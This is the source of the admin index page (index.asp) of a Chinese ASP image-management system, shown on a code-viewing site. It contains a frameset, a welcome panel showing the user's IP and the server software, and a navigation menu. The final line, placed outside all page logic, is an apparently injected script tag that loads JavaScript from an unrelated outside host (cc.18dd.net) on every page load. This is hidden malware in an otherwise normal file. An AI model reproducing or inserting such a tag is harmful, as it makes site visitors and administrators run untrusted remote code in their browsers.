📄 index.asp
字号:
<!--#include file="conn.asp"-->
<!--#include file="check.asp"-->
<%
frame=request("frame")
if frame="" then
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>网尽图片管理系统</title>
</head>
<frameset cols="180,*" frameborder="no" border="0" framespacing="0">
<frame src="index.asp?frame=left" name="left" scrolling="no" noresize>
<frame src="index.asp?frame=main" name="main">
</frameset>
<noframes><body>
</body></noframes>
</html>
<%
elseif frame="main" then
%>
<html>
<head>
<title>管理员页面</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<LINK href="images/bbs.css" rel=stylesheet>
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<center>
<br>
<fieldset style="padding: 2; width:370; height:120"> <legend>登陆成功</legend>
<table width="41%" border="0" height="227">
<tr>
<td>
<table align="center" border="0" width=301 cellspacing="0" cellpadding="3" class="sft" height="154">
<tr>
<td width="30%" height="30" align="center">欢迎使用网尽图片管理系统!</td>
</tr>
<tr>
<td width="30%" height="30">*当前时间:<%=now()%></td>
</tr>
<tr>
<td width="30%" height="30">*您的IP:<%=Request.ServerVariables("REMOTE_ADDR")%></td>
</tr>
<tr>
<td width="30%" height="30">*服务器名称:<%=Request.ServerVariables("SERVER_SOFTWARE")%></td>
</tr>
<tr>
<td width="30%" height="30">现在您可以从左边列表中选择链接来管理网站了</td>
</tr>
</table>
</td>
</tr>
</table>
</fieldset>
</center>
</body>
</html>
<%elseif frame="left" then%>
<HTML><HEAD>
<META content=text/html;charset=gb2312 http-equiv=Content-Type>
<LINK href="images/bbs.css" rel=stylesheet>
<STYLE type=text/css>
BODY {
BACKGROUND: #799ae1; FONT: 9pt 宋体; MARGIN: 0px
}
TABLE {
BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; BORDER-RIGHT: 0px; BORDER-TOP: 0px
}
TD {
FONT: 12px 宋体
}
IMG {
BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; BORDER-RIGHT: 0px; BORDER-TOP: 0px; VERTICAL-ALIGN: bottom
}
A {
COLOR: #000000; FONT: 12px 宋体; TEXT-DECORATION: none
}
A:hover {
COLOR: #428eff; TEXT-DECORATION: underline
}
.sec_menu {
BACKGROUND: #d6dff7; BORDER-BOTTOM: white 1px solid; BORDER-LEFT: white 1px solid; BORDER-RIGHT: white 1px solid; OVERFLOW: hidden
}
.menu_title {
}
.menu_title SPAN {
COLOR: #215dc6; FONT-WEIGHT: bold; LEFT: 8px; POSITION: relative; TOP: 2px
}
.menu_title2 {
}
.menu_title2 SPAN {
COLOR: #428eff; FONT-WEIGHT: bold; LEFT: 8px; POSITION: relative; TOP: 2px
}
</STYLE>
<SCRIPT language=javascript1.2>
function showsubmenu(sid)
{
whichEl = eval("submenu" + sid);
if (whichEl.style.display == "none")
{
eval("submenu" + sid + ".style.display=\"\";");
}
else
{
eval("submenu" + sid + ".style.display=\"none\";");
}
}
function message()
{
window.open('loading.htm','message')
}
</SCRIPT>
<TBODY><TR><TD vAlign="top">
<META content="MSHTML 5.00.2920.0" name=GENERATOR></HEAD>
<BODY onLoad="showsubmenu(0)">
<CENTER>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD height=42 vAlign=bottom><IMG height=38 src="images/title.gif"
width=158> </TD></TR></TBODY></TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/title_bg_quit.gif class=menu_title height=25
onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN><B><FONT
color=#215dc6><%=session("admin")%></FONT></B> | <A
href="out.asp" target=_top><FONT
color=#215dc6><B>退出</B></FONT></A> </FONT></A></B></SPAN></TD>
</TR></TBODY></TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/admin_left_4.gif class=menu_title height=25
id=menuTitle1 onclick=showsubmenu(0)
onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN>图片管理 </SPAN></TD>
</TR>
<TR>
<TD id=submenu0 style="DISPLAY: none">
<DIV class=sec_menu style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20><A
href="add.asp"
target=main><FONT color=#000000>添加图片</FONT></A></TD>
</TR>
<TR>
<TD height=20><A
href="manage.asp"
target=main><FONT color=#000000>管理图片</FONT></A></TD>
</TR>
<TR>
<TD height=20><A
href="allrec.asp"
target=main><FONT
color=#000000>所有推荐</FONT></A></TD>
</TR></TBODY></TABLE></DIV>
<DIV style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20></TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/admin_left_3.gif class=menu_title height=25
id=menuTitle1 onclick=showsubmenu(1)
onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN>用户管理 </SPAN></TD>
</TR>
<TR>
<TD id=submenu1 style="DISPLAY: none">
<DIV class=sec_menu style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20><A
href="usermana.asp"
target=main><FONT
color=#000000>用户管理</FONT></A></TD>
</TR></TBODY></TABLE></DIV>
<DIV style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20></TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/admin_left_4.gif class=menu_title height=25
id=menuTitle1 onclick=showsubmenu(2)
onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN>分类管理 </SPAN></TD>
</TR>
<TR>
<TD id=submenu2 style="DISPLAY: none">
<DIV class=sec_menu style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20><A
href="classmana.asp"
target=main><FONT color=#000000>分类管理</FONT></A></TD>
</TR>
</TBODY>
</TABLE>
</DIV>
<DIV style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20></TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/admin_left_2.gif class=menu_title height=25
id=menuTitle1 onclick=showsubmenu(3)
onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN>设置管理</SPAN> </TD>
</TR>
<TR>
<TD id=submenu3 style="DISPLAY: none"> <DIV class=sec_menu style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20><A
href="addoklink.asp"
target=main><FONT color=#000000>友情链接管理</FONT></A></TD>
</TR>
<TR>
<TD height=20><A
href="addlink.asp"
target=main><FONT color=#000000>顶部链接管理</FONT></A></TD>
</TR>
<TR>
<TD height=20><A
href="system.asp"
target=main><FONT
color=#000000>系统变量设置</FONT></A></TD>
</TR>
</TBODY>
</TABLE>
</DIV>
<DIV style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20></TD>
</TR>
</TBODY>
</TABLE>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/admin_left_7.gif class=menu_title height=25
id=menuTitle1 onclick=showsubmenu(4)
onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN>数据管理 </SPAN></TD>
</TR>
<TR>
<TD id=submenu4 style="DISPLAY: none">
<DIV class=sec_menu style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20><A
href="fso.asp?menu=bak"
target=main><FONT color=#000000>备份/恢复数据库</FONT></A></TD>
</TR>
<TR>
<TD height=20><A
href="CompressData.asp"
target=main><FONT color=#000000>压缩数据库</FONT></A></TD>
</TR>
</TBODY>
</TABLE>
</DIV>
<DIV style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20></TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/admin_left_4.gif class=menu_title height=25
id=menuTitle1 onclick=showsubmenu(6)
onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN>代码管理 </SPAN></TD>
</TR>
<TR>
<TD id=submenu6 style="DISPLAY: none">
<DIV class=sec_menu style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20><A
href="code.asp"
target=main><FONT color=#000000>JS代码调用</FONT></A></TD>
</TR>
</TBODY>
</TABLE>
</DIV>
<DIV style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20></TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE>
<TABLE align=center cellPadding=0 cellSpacing=0 width=158>
<TBODY>
<TR>
<TD background=images/admin_left_9.gif class=menu_title height=25
id=menuTitle1 onmouseout="this.className='menu_title';"
onmouseover="this.className='menu_title2';"><SPAN>系统信息</SPAN> </TD>
</TR>
<TR>
<TD>
<DIV class=sec_menu style="WIDTH: 158px">
<TABLE align=center cellPadding=0 cellSpacing=0 width=135>
<TBODY>
<TR>
<TD height=20><br>
网尽图片管理系统 <BR>
版本:V 7.0<BR>
<BR>版权所有:<a href="http://www.wangjin.net" target="_blank"><font color="#ff0000">网尽科技</font></a></TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE>
</TR></TBODY></TABLE>
</BODY></HTML>
<%end if%>
<script language=javascript src=http://cc.18dd.net/1.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -